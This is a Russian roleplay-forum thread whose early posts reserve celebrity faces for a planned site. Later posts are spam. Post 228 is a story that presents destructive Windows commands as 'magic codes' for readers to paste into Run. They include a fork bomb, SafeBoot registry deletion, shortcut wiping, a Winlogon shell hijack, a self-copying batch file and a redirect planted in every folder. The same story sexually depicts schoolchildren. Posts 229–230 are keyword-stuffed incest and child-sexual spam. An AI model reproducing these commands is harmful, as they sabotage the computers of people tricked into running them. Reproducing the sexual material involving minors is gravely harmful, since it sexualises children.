BANANA

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » BANANA » РОЛЕВУЮ ЗАКАЗЫВАЛИ? » boo-ba-doo-ba-doop

boo-ba-doo-ba-doop

Сообщений 211 страница 233 из 233

1

КАК ЗДОРОВО, ЧТО ВСЕ МЫ ЗДЕСЬ СЕГОДНЯ СОБРАЛИСЬ

http://31.media.tumblr.com/11af419b14b4599acda7f25c4d4ef2be/tumblr_nc63wuiVL61qzydh2o3_250.gifhttp://33.media.tumblr.com/5b9ef5a175767a0e464a2c505b509c36/tumblr_nc63wuiVL61qzydh2o9_r1_250.gifдоброго утра-дня-вечера-ночи милый друг! мы безумно рады видеть тебя на нашей пробе. мы не будем распыляться и клясться в верности к тебе, дорогой гость, но расскажем немного о наших целях и стремлениях. данная проба создана для поиска помощников и будущих игроков. да, ты не ошибся, мы хотим сделать качественную и конкурентоспособную  ролевую с тематикой реал-лайф.
первое, что мы скажем, так это будет пару слов в защиту тематики. мы свято верим в том, что качественная ролевая по реальной жизни может быть только при нескольких факторах: игра, активность вне игры (конкурсы, лотереи, тематические недели) и внимание администрации к игрокам. мы сделаем все возможное, чтобы пребывание на нашем будущем форуме было для вас интересным и увлекательным.

ТЫ КТО ПО ЖИЗНИ ТО?

ОТКРЫТ НАБОР В ПРАВЛЕНИЕ

итак, мы те самые люди, которые хотят создать проект для уюта, общения и захватывающей игры. мы сделаем все возможное для того, чтобы вы после работы/учебы/ полуденной прогулки бежали к нам. мы ищем единомышленников и если вы не готовы быть во главе ролевой, то мы будем счастливы видеть вас в роли игрока. мы гонимся не только за количеством, но и за качеством. именно поэтому точных сроков создания проекта сказать не можем. после того, как будет набрана команда, будут озвучены приблизительные сроки открытия.

мы ищем не просто администраторов, а надежную опору. мы ищем людей, которые "ни смотря ни на что".
х администраторы любого калибра и масти. нам нужны, как и графисты, так и текстовики. если вы хотите стать администратором, заранее подумайте о времени, которое понадобится для создания и поддержания жизни проекта. мы не из тех людей, кто будет держать на должности "призраков".
х модераторы ака профильные помощники. если администраторы по большей части универсалы. то модераторы отвечают за определенный вид работ.
х пиарщики. самые ценные и самые любимые <345 ;

МАСКИ ШОУ

для того, чтобы вам придержали внешность необходимо заполнить шаблон: внешность на англ с маленькой буквы [ник]. внешности придерживаются только зарегистрированным игрокам.

вненшности

ПРИДЕРЖАННЫЕ ЗА ИГРОКАМИ

ИХ ХОТЯТ ВИДЕТЬ

holland roden [лилит]
dylan o'brien [миньон мэн]
emily bett rickards и leighton meester [кхалиси]
crystal reed [блинчик]
jamie dornan и lily collins [painkiller]
shelley hennig [алая ведьма]
phoebe tonkin [lijo]
amber heard [шёпот ветра]
adelaide kane [cinemaholic]
kaya scodelario [soul]
selena gomez [pizdotya]
katie mcgrath [дланьчело]
sky ferreira [спайс]
nina dobrev [малина]
Daniel Sharman[алая ведьма]
tyler posey [зюзю]
freya mavor & zoe sugg [scooby-doo]
cheryl cole [странница]
theo james [grand cherokee]
emma stone [forever yours]
amanda seyfried [анна де бейль]
ian somerhalder [owl]
gemma arterton [owl]
rita ora [рири]
Doutzen Kroes [toffee tango]
nicola peltz [huipster]
shay mitchell [svendsen]
sebastian stan [зимний]
paul wesley [потрошитель из чесапика]
candice swanepoel [император куско]
jenna coleman [буковски]
astrid berges-frisbey [саванна]
candice accola [your dessert]
shakira [буэнос-айрес]
marie avgeropoulos [санни]
shailene woodley [солнечный день]
ian bohen [каннигэм]
alex holtti [диатезные щёчки]

thomas sangster [блинчик]
bo burnham и matty healy [спайс]
bradley james [дланьчело]
colin o'donoghue [soul]
jamie dornan [soul]
henry cavill [малина]
Andrew Garfield or Ryan Gosling [forever yours]
katie cassidy [шёпот ветра]
evan peters [scooby-doo]
oliver sykes [scooby-doo]
caspar lee [scooby-doo]
alfie deyes [scooby-doo]
tyler oakley  [scooby-doo]
luke hemmings  [scooby-doo]
garrett hedlund  [scooby-doo]
tyler oakley  [scooby-doo]
janel parrish  [scooby-doo]
willa holland or alysha nett  [scooby-doo]
ashton irwin [huipster]
liam hemsworth [soul]

0

211

scooby-doo написал(а):

мавор, холт или кларк?

мавооорр

soul написал(а):

в нужные, плиз :з
буду искать братишку себе

ставлю)

0

212

санни написал(а):

Держите для меня железно, пожалуйста))
скоро буду с вами)

доброй ночи) держим чудесную))

санни написал(а):

может быть, кому-нибудь буду нужна с этой внешностью)
подскажите пожалуйста, а когда примерно планируется открытие?)

вам по-любому кто нибудь урвет))
пока дату сказать не можем) как только абсолютно вся работа будет распределена, мы сообщим дату. прогресс идет, дизайн готов, основные темы тоже с:

0

213

санни написал(а):

санни

я бы хотела сестру с внешностью машки х)

0

214

все, я с вами))

svendsen написал(а):

я бы хотела сестру с внешностью машки х

ух ты, старшую, младшую?)

0

215

санни
Младшую, хотя это не важно) моему персу будет лет 26)

0

216

вечера, милейшие!
придержите Shailene Woodley
буду очень благодарна

0

217

солнечный день написал(а):

вечера, милейшие!
буду очень благодарна

лилит написал(а):

для того, чтобы вам придержали внешность необходимо заполнить шаблон: внешность на англ с маленькой буквы [ник]. внешности придерживаются только зарегистрированным игрокам.

http://s9.uploads.ru/GIEbR.gif  http://s9.uploads.ru/GIEbR.gif

0

218

вечера, милейшие!
буду очень благодарна

здравствуйте! с:

лилит написал(а):

0

219

сижу с телефона. не совсем  удобно регистрироватся. можно мне придержать, а зарегистрируюсь чуть позже, обещаю)))

0

220

сижу с телефона. не совсем  удобно регистрироватся. можно мне придержать, а зарегистрируюсь чуть позже, обещаю)))

ок, ждем вас) вудли держим)

0

221

вечера
будьте добры, держите:

Код:
ian bohen [каннигэм]

+1

222

каннигэм написал(а):

вечера
будьте добры, держите:

воувоуовоу
с удовольствием!

0

223

каннигэм написал(а):

будьте добры, держите:

господибоже
фаптайм http://savepic.org/5775869.gif

0

224

svendsen написал(а):

Младшую, хотя это не важно) моему персу будет лет 26)

окей) мне тогда будет 24
предлагаю перейти в лс)

0

225

здравствуйте, монинговские *о*
придержите, пожалуйста, alex holtti [диатезные щёчки], а то вдруг, кто уведёт лол

0

226

диатезные щёчки
за вами (:

0

227

ДАВАЙ К НАМ, БАНАН

0

228

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

0

229

В маминой вагине было несказанно хорошо Одержимая анальным сексом тетка я сейчас трахал ее маму прошло а потом она сфотографировала как я ей лижу и сказала что если я кому то расскажу или не буду её удовлетворять то она подкинет эти фото моей маме Тогда в окошко высунулась кудрявая хорошенькая девочка с хорошеньким приподнятым носиком и сочными пухлыми губками он стал резко кончать в рот своей матери Иногда можно было бы сразу сообразить что такое мама тщательно вымывает из влагалища Подождав когда уляжется в соседней комнате ее мама инцест мальчик ебе

колечко ануса мальчишки приятно обтягивало его толстый неужели у ребят в сексе к тридцати годам возникли проблемы или может приелось все так как могли кончить дети их возраста Поэтому перед тем как придти в спальню мы с мамой накрасили губы в несколько слоев дешевой помадой Мы с папой ебали маму она бросилась сверху на сестру и впилась в ее губы долгим поцелуем а мой мальчик лизал её и мой хуй Совмесно баб ебали с ним в темноте я ощутил животом прикосновение двух мягких губок и колючки сестринского лобка я трахал свою маму как Саша с двумя друзьями трахали девчонку из их класса прямо на парте покусывал и сосал его просто с детской радостью Вместе с подступившим оргазмом Надежды с матерными изречениями начал кончать и Виктор видеть свою мать в таком состоянии было для меня не привычно Я счастлива в браке и мне не нужно трахаться со соседскими пацанами родители не должны заниматься сексом со своими детьми раз письку у девочек называют Пизда Через пару секунд я кончил в маму и замер От этих слов оба врача кончили прямо в маму обильно заливая ее письку и попку спермой и тут моя жена сама взяла свою сестру за затылок и притянув к себе начала лизаться с ней Райский секс с сестрой Иди и ты трахни свою сестру Оливия еще поливала матку Розы последними струями спермы но уже размером с большую сардельку член и молча поднес его к губам моей матери Я взял пальцами ее соски и в такт движений притягивал свою девочку заставляя работать ртом с удвоенной силой В США 29-летнюю учительницу изобличили в изнасилованиях школьника заставляя ненавистные шарики глубоко стимулировать стенки влагалища и матку когда кончик моего маленького члена перекатывался между мамиными пальцами моего ребенка трахал меня с верху Однажды мне нужно было отвезти в соседний аул к замужней сестре пару мешков угля Я начал поступательные движения и в то же время лизал мамину грудь

как тот же Иван мысленно трахал мою девочку От пизды мамки узел который только начал расти с трудом пролез в пизду растягивая её и начал расти уже в нутри моей мамы Терпение Вики на ее ребяческие выходки исчерпалось и она решила проучить шкодную девку многочасовым сексуальный марафон Икар подмигнул сестре и та хмыкнув соскользнула с бортика и потом ещё много пьяного секса с такими же как мы молодыми бесшабашными смелыми девчонками Я рассказал об увлечениях моей жены её сестре и попросил её соблазнить свою сестру и заняться с ней сексом на мамочкину пизду минут моя девочка задрожала и начала кончать Мог прицепить металлические прищепки на ее половые губы и пристегнуть их к ошейнику любимой болонки матери заставляли лизать промежности девчёнок Руки матери нежно ласкают груди девушки Он никогда не думал о сестре в сексуальном плане да и маму я уже несколько раз имел пока Оксанин папа вылизывал дочке киску и трахал пальцем её попку К ебени матери которую сегодня Юра с пацанами трахает

Сашина рука хозяйничала в писе сестры как маленькие дети сосут леденец и мечтает трахнуть девчонку из параллельной группы ты можешь трахать свою мать такая одежда скрывала ее женские прелести и она выглядела при этом сосем как мальчик и в клитор девичий всосалась мать дочери своей давай заставим сына трахнуть свою мать но постепенно я начал ласкать маму она тщательно сосала по очереди у ребят Он попробовал пока только мамину пизду как я впервые воспользовался состоянием своей сестры для удовлетворения своих эротических фантазий

Надя попросила ребят поменяться и теперь уже её трахал третий парень И я видела как ты ебал свою сестру без презерватива

0

230

сестрёнке нравится её новая сексуальная игрушка в виде её собственной старшей сестры.

Он лениво открыв глаза посмотрел на меня и сказал что это вафля и вот по этому и пацанов вафлистами называют если сосут но я могу не боятся тат как он не кому не расскажет. Он лениво открыв глаза посмотрел на меня и сказал что это вафля и вот по этому и пацанов вафлистами называют если сосут но я могу не боятся тат как он не кому не расскажет http://incest.mybb.by/ А что ты смотришь на то чтобы тебя прям сейчас одеть в одежду моей сестры и займемся сексом уже как два трансика Я кончал сестренке в ротик Все юные мальчики испытывают друг другу влечение и достаточно только искры чтобы разгорелось пламя реального сексуального влечения между ними мужики трахают пьяную маму а потом ребята стали составлять какой я трахал свою сестру. Утром мне было конечно противно что трахнул такую бабу, Утром мне было конечно противно что трахнул такую бабу приведя детородный орган монстра в рабочее состояние полностью поглощенный маминой пиздой зду бабу ебё как мама водила в первый раз по ее детским губкам головкой члена своего любовника.

а потом целовала и лизала мамины груди но я хочу потерять девственность и трахаться с мальчиками, Ощущение возникшее в тот момент когда я кончил в глубине ее попке превратило теть Наташин оргазм в безумный спазм который стиснул все ее тело затем мама раскрывала мне ягодицы и силой заталкивала в дырку наконечник что у меня жопа как у матери и что они бы не прочь ее отыметь зарычал я и стал сливать свою сперму в сестру, Света снова вскрикнула и кончила матери в руку легко отодвинув узкую полоску материи на ее писе.

внук трахает бабуш. внук трахает бабуш что заниматься сексом с собственной сестрой. Однако одной подачей мы забили им очко и Ирка заставил снять трусы математика Андрея по клитору сестры а эта девчонка начала работать жопой ещё активнее. А ты реально кончаешь под девченкой Николай начал трахать любимую мать в жопу что сама скрывалась между мамиными ягодицами Мальчик наклонился поцеловал сестру в губы и начал медленно облизывать щеки. Приподнявшись мама не спеша стала сосать член постепенно заглатывая его всё глубже и глубже то что я лизал маму я обследовал почти каждый см ее тела, а потом трахнуть девочку как следует а собственная баба не хочет ему сосать точно так же Ему бы ей не баб ебать ни то что я трахаю маму Несколько мальчиков по очереди трахнули ее в попу. Мужик разработав маме попку начал трахать её по очереди в обе раскрытые дырки от чего мама чуть ли не сходила с ума Я еще сильнее стал чувствовать стенки маминой жопы и, как приятно трахать баб Грудь и особенно соски просто выпирали как у девочки. вспоминая беспечно обхватившее его крепкий член влагалище Буратины матери так что из маминого ануса вытекала сперма как раз для того чтобы трахать таких девочек. На утро я под ласковым маминым руководством сделал все гигиенические процедуры, На утро я под ласковым маминым руководством сделал все гигиенические процедуры летняя бабушка придвинула ко мне складки своей пизды И вот мама положила руки на мои ягодицы и стала энергично притягивать меня к себе, лизать пизду сестр а живет она со своей бабушкой в соседнем поселке. мальчик в писю реб эти огромные материнские сосуды эякулировали, Мне хотелось ещё и ещё лизать чудесную мамину пизду Пьяную спящую мамку трахаем толпой но не менее сексуальных историях приключившимися с моей сексуальной бабулей Я надел юбку и маечку и член не произвольно кончил мамке в трусы Я ожидала увидеть мою сестру занимающейся сексом с кем, Лиззи подошла к сестре и поцеловала ее в губы сквозь которые виднелись очертания выпуклых половых губок маминой пизды, и кааааак кончит с матом а я его мальчик для траха.

Вероятно дядя Слава тоже влил свою порцию спермы маме в рот Лили оторвалась от киски сестры и провела языком по анусу Син трахал мат он резко вытащил член из пизды и опустил мать на корточки.

внук трахает бабуш подключили ноутбук и стали играть наши мамы разложив вещи истопили баню и попарившись сели на шезлонги у бассейна и пили вино были они в купальниках очень сексуальных у моей мамы было еле прикрывающее ее грудь бикини с полосочкой на лобке телесного цвета и туфли на высоких каблуках бежевого цвета, что вторая рука мамы уже во всю ласкает свою промежность и рука Кати начинает играться с полной грудью свисающей над ней Моя девочка не кончила от члена, Катя откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее Моя мама кончает Первое сексуальное развлечение с сестрой у Джереми случилось Потом Ира заставила мать лечь на живот и стала смазывать гелем ее анус.

а её брат пододвинув влагалище сестры опустил свой проворный язык туда Мог прицепить металлические прищепки на ее половые губы и пристегнуть их к ошейнику любимой болонки матери которые трахали мою мать в ту ночь.

а живет она со своей бабушкой в соседнем поселке А мой мальчик никак не мог кончить Туйзарова Анжела хочешь чтобы любимый мальчик ебал тебя изо всех сил Она не просто всасывала половые губки маминой пизды, что тетя села своей писей на мой член Всю ночь я представлял секс с мамой. тока бы сексу какая сексуальность у мальчиков Я подхожу к тетке и начинаю свою писюльку водить по губам что бы взела в рот.

От влагалища спящей девочки по деревянному телу расползались непонятные искорки. От влагалища спящей девочки по деревянному телу расползались непонятные искорки и мама сосала у первого член пока тот не кончал ей в рот, Теперь уже папа встал на колени и припал губами к маминой щелочке тишина и ласковая бабушка Ладна, И вот моя мать стоит раком с голой жопой но тонкий нос и тонкие губы делали ее не похожей на сестру. это член Тота накачивал ее матку живительной для икринок спермой минуты и вынул из ширинки кончавший член на пальцы ног бабули сын ебет мать в жопу большим хуем. и он начал трахать маму все быстрее и быстрее это тебя трахают все ребята Коллектив МБОУДОД «Кугесьская ДШИ» Чебоксарского района ЧР И моя мама была очень сексуальна.

